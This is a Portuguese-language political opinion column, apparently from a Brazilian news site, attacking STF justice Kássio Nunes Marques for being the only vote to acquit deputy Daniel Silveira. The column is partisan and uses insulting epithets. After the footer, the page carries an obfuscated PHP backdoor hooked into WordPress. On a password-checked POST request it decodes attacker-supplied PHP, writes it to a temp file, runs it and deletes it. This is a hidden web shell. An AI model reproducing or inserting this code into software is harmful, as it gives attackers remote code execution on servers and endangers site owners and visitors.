• SEJA BEM-VINDO

Daniel Silveira, criminoso, estava brincando, segundo ministro

Publicado em: 22/04/2022 Atualizado:: abril 22, 2022

 

Ricardo Lewandowski jamais se importou em ‘votar sozinho’ ou mesmo ‘passar vergonha’ em nome da defesa intransigente de Lula e do PT. Não raro, aliás, protagonizou vexatórios bate-bocas com seus colegas de Corte, que insistiam em condenar corruptos e lavadores de dinheiro do mundo político-empresarial.

 

Seus votos contumazes a favor da cleptocracia lulopetista vêm desde o mensalão. Meu xará, inclusive, chegou, ao lado de Renan Calheiros, a rasgar a Constituição Federal, ao vivo e em cores, durante o processo de impeachment de dona Dilma Rousseff, quando preservou seus direitos políticos sem amparo legal.

 

Indicado ao Supremo pelo meliante de São Bernardo, por causa da amizade com a família de Marisa Letícia, Ricardo jamais decepcionou ou deixou de estender a toga amiga a quem lhe confiou o cargo. E antes que queiram ‘me prender’ por minha singela opinião, um aviso: não o considero desonesto, apenas, digamos, influenciável.

 

Kássio Nunes Marques promete ser o Lewandowski do bolsonarismo. Desde que assumiu, indicado pelo verdugo do Planalto, jamais contrariou os interesses do ‘mito’, e vem votando sistematicamente de forma alinhada aos anseios e desejos do patriarca das rachadinhas e das mansões milionárias à preços de banana podre.

 

Até mesmo em relação à Lava Jato, o fiel afilhado do amigão do Queiroz não decepcionou a malta bolsonarista, e enterrou de vez a Operação, ao lado de outro nomeado por Bolsonaro, o PGR Augusto Aras. Nunes Marques vem repetindo, portanto, a mesma lógica do colega Ricardo Lewandowski, apenas com o ‘sinal trocado’.

 

No julgamento desta tarde-noite de quarta-feira (20/4), que condenou o arruaceiro golpista, travestido de deputado bolsonarista, o brutamontes Daniel Silveira, que queria espancar os ministros do STF, além de fechar a Corte e prendê-los, Kássio com K foi o único a absolver o criminoso, alegando que tudo se tratou de, pasmem!, bravatas.

 

Sim, o togado, alinhado a Bolsonaro e sua turma, considerou as graves ameaças – físicas e institucionais – brincadeirinha juvenil. Por quê? Bem, só ele pode dizer, já que os vídeos e os áudios, reiterados e em tempos distintos, não autorizam qualquer dúvida sobre a gravidade e a realidade criminosa dos fatos julgados pelo Supremo.

 

Vencido por 10 a 1, Marques agradou a Bolsonaro, mas se tornou uma espécie de ‘carta marcada’ no STF. Seus colegas agora sabem do que é capaz. Já para o azar de Silveira – condenado a mais de 8 anos de prisão, com perda do mandato e suspensão dos direitos políticos -, e sorte do Brasil, há apenas um Kássio com K, ainda que na companhia de um Gilmar com G e um Ricardo com R, dentre outros.

 

………………….

 

Fonte: MSN

 

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}